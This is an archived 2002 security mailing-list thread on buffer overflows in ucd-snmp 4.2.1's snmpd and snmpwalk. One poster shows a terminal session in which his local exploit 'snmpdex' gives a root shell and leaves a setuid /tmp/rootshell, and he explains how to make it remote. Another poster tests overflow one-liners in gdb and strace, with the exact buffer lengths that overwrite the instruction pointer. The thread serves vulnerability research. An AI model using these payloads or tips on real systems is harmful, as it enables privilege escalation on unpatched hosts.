Re: snmpd exploit examination - snmpwalk

[The Itch <itchie () bse die ms>]

Well i did got positive results on a slackware 8.0 box running ucd-snmpd 4.2.1

-----
itchie@napalm:~$ /usr/local/sbin/snmpd --version

UCD-snmp version:  4.2.1
Author:            Wes Hardaker
Email:             ucd-snmp-coders () ucd-snmp ucdavis edu

itchie@napalm:~$ ps -ax|grep snmpd
 3686 pts/0    S      0:00 /usr/local/sbin/snmpd
itchie@napalm:~$ ls -l /tmp/p00p
/bin/ls: /tmp/p00p: No such file or directory
itchie@napalm:~$ ls -l /tmp/rootshell*
/bin/ls: /tmp/rootshell*: No such file or directory
itchie@napalm:~$ ./snmpdex
Promisc Digital Research Group presents
a local exploit for ucd-snmp-4.2.1

Coded by The Itch
http://www.promisc.org

ps: leaves a rootshell in /tmp/rootshell
Timeout: No Response from 127.0.0.1
bash-2.05# id
uid=0(root) gid=0(root) groups=100(users)
bash-2.05# ls -l /tmp/rootshell
-rwsr-xr-x    1 root     root        13456 Feb 21 22:33 /tmp/rootshell
bash-2.05# ps -ax|grep snmp
bash-2.05#
-------------

You could make it remote too, by adjusting the shellcode to something
portbinding, however the problems that i encountered:
the lengt to crash snmpd must be exactly 256 bytes, one more or one less
will give no result.

The string however gets cut in half by snmpd so the only really
usefull part is the first half which is about 144 bytes long. 

have fun, 

-----
On Wed, 20 Feb 2002, KF wrote:

I am not so sure about those proof of concept remote snmp exploits that
were posted... they look
more like
local exploits to me.

[root@linuxppc root]# ps -ef | grep snmp
root      6355     1 17 15:02 pts/1    00:00:59 /usr/sbin/snmpd -s -l
/dev/null

(gdb) r  127.0.0.1 public `perl -e 'print "A" x 293'`
Starting program: /usr/bin/snmpwalk 127.0.0.1 public `perl -e 'print "A" x
293'`
Program received signal SIGSEGV, Segmentation fault.
0x0ff963c0 in read_objid () from /usr/lib/libsnmp-0.4.2.1.so
(gdb) bt
#0  0x0ff963c0 in read_objid () from /usr/lib/libsnmp-0.4.2.1.so
#1  0x0ff99358 in snmp_parse_oid () from /usr/lib/libsnmp-0.4.2.1.so
#2  0x10000e28 in _init ()
#3  0x0fc6eb90 in __libc_start_main () from /lib/libc.so.6

(gdb) r  127.0.0.1 public `perl -e 'print "A" x 308'`
Starting program: /usr/bin/snmpwalk 127.0.0.1 public `perl -e 'print "A" x
308'`
Program received signal SIGILL, Illegal instruction.
0x41414100 in ?? ()

(gdb) r  127.0.0.1 public `perl -e 'print "A" x 309'`
Starting program: /usr/bin/snmpwalk 127.0.0.1 public `perl -e 'print "A" x 309'`
Program received signal SIGILL, Illegal instruction.
0x41414140 in ?? ()

This is snmpwalk NOT snmpd dying...

[root@linuxppc root]# ps -ef | grep snmp
root      6355     1  5 15:02 pts/1    00:00:59 /usr/sbin/snmpd -s -l
/dev/null

Still running...

Ok lets use a newer version of snmpwalk
[root@linuxppc ucd-snmp-4.2.2]# apps/snmpwalk 127.0.0.1 public `perl -e
'print "A" x 309'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAA: Unknown Object Identifier
(AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA)

[root@linuxppc root]# ps -ef | grep snmp
root      6355     1  4 15:02 pts/1    00:00:59 /usr/sbin/snmpd -s -l
/dev/null

still running...

These are the examples I have seen in various emails as methods to exploit
snmpd...These seem to
do
nothing on my box to the client or the daemon...

        snmpwalk 127.0.0.1 `perl -e 'print "\x90" x 256'`
        execl("snmpwalk", "snmpwalk", "-p", port, host, buf, NULL);

execl("/usr/local/bin/snmpwalk","snmpwalk",argv[1],"-c",buffer,NULL);

Here are my results.
[root@linuxppc mail.snosoft.com]# snmpwalk 127.0.0.1 -c `perl -e 'print
"A" x 256'`
Timeout: No Response from 127.0.0.1

[root@linuxppc mail.snosoft.com]# snmpwalk 127.0.0.1 `perl -e 'print
"\x90" x 450'`

Timeout: No Response from 127.0.0.1

[root@linuxppc mail.snosoft.com]# snmpwalk -p 161 127.0.0.1 `perl -e
'print "A" x 4050'`
Timeout: No Response from 127.0.0.1

Addtional findings.
[root@linuxppc mail.snosoft.com]# snmpwalk -p 161 127.0.0.1 public `perl
-e 'print "A" x 4050'`
Segmentation fault

[root@linuxppc mail.snosoft.com]#  snmpwalk 127.0.0.1 -c public `perl -e
'print "A" x 4050'`
Segmentation fault

Mean while the daemon reads the requests with no problems...
[0fc4abcc] _newselect(0x5, 0x7fffe808, 0x7fffe888, 0x7fffe908, 0) = 1
[0fc5211c] recvfrom(4,
"0\202\1\352\2\1\0\4\202\1\310\220\220\220\220\220\220\220"..., 8192, 0,
{sin_family=AF_INET, sin_port=htons(32795),
sin_addr=inet_addr("127.0.0.1")}}, [16]) = 494
[0fc142b4] gettimeofday({1014238429, 731763}, NULL) = 0
[0fc4abcc] _newselect(0x5, 0x7fffe808, 0x7fffe888, 0x7fffe908, 0) = 1
[0fc5211c] recvfrom(4,
"0\202\1\352\2\1\0\4\202\1\310\220\220\220\220\220\220\220"..., 8192, 0,
{sin_family=AF_INET, sin_port=htons(32795),
sin_addr=inet_addr("127.0.0.1")}}, [16]) = 494
[0fc142b4] gettimeofday({1014238430, 739274}, NULL) = 0

[root@linuxppc mail.snosoft.com]# snmpwalk 127.0.0.1 `perl -e 'print
"\x90" x 3999'`
Timeout: No Response from 127.0.0.1

[0fc5211c] recvfrom(4,
"0\202\17\301\2\1\0\4\202\17\237\220\220\220\220\220\220"..., 8192, 0,
{sin_family=AF_INET, sin_port=htons(32795),
sin_addr=inet_addr("127.0.0.1")}}, [16]) = 4037
[0fc142b4] gettimeofday({1014238568, 885323}, NULL) = 0
[0fc4abcc] _newselect(0x5, 0x7fffe808, 0x7fffe888, 0x7fffe908, 0) = 1
[0fc5211c] recvfrom(4,
"0\202\17\301\2\1\0\4\202\17\237\220\220\220\220\220\220"..., 8192, 0,
{sin_family=AF_INET, sin_port=htons(32795),
sin_addr=inet_addr("127.0.0.1")}}, [16]) = 4037

Give it too many chars and snmpwalk complains.
[root@linuxppc mail.snosoft.com]# snmpwalk 127.0.0.1 `perl -e 'print
"\x90" x 5000'`
snmpwalk: Error building ASN.1 representation

Again YOUR results may vary ... these are mine.

-KF

Attachment: snmpdex.c
Description: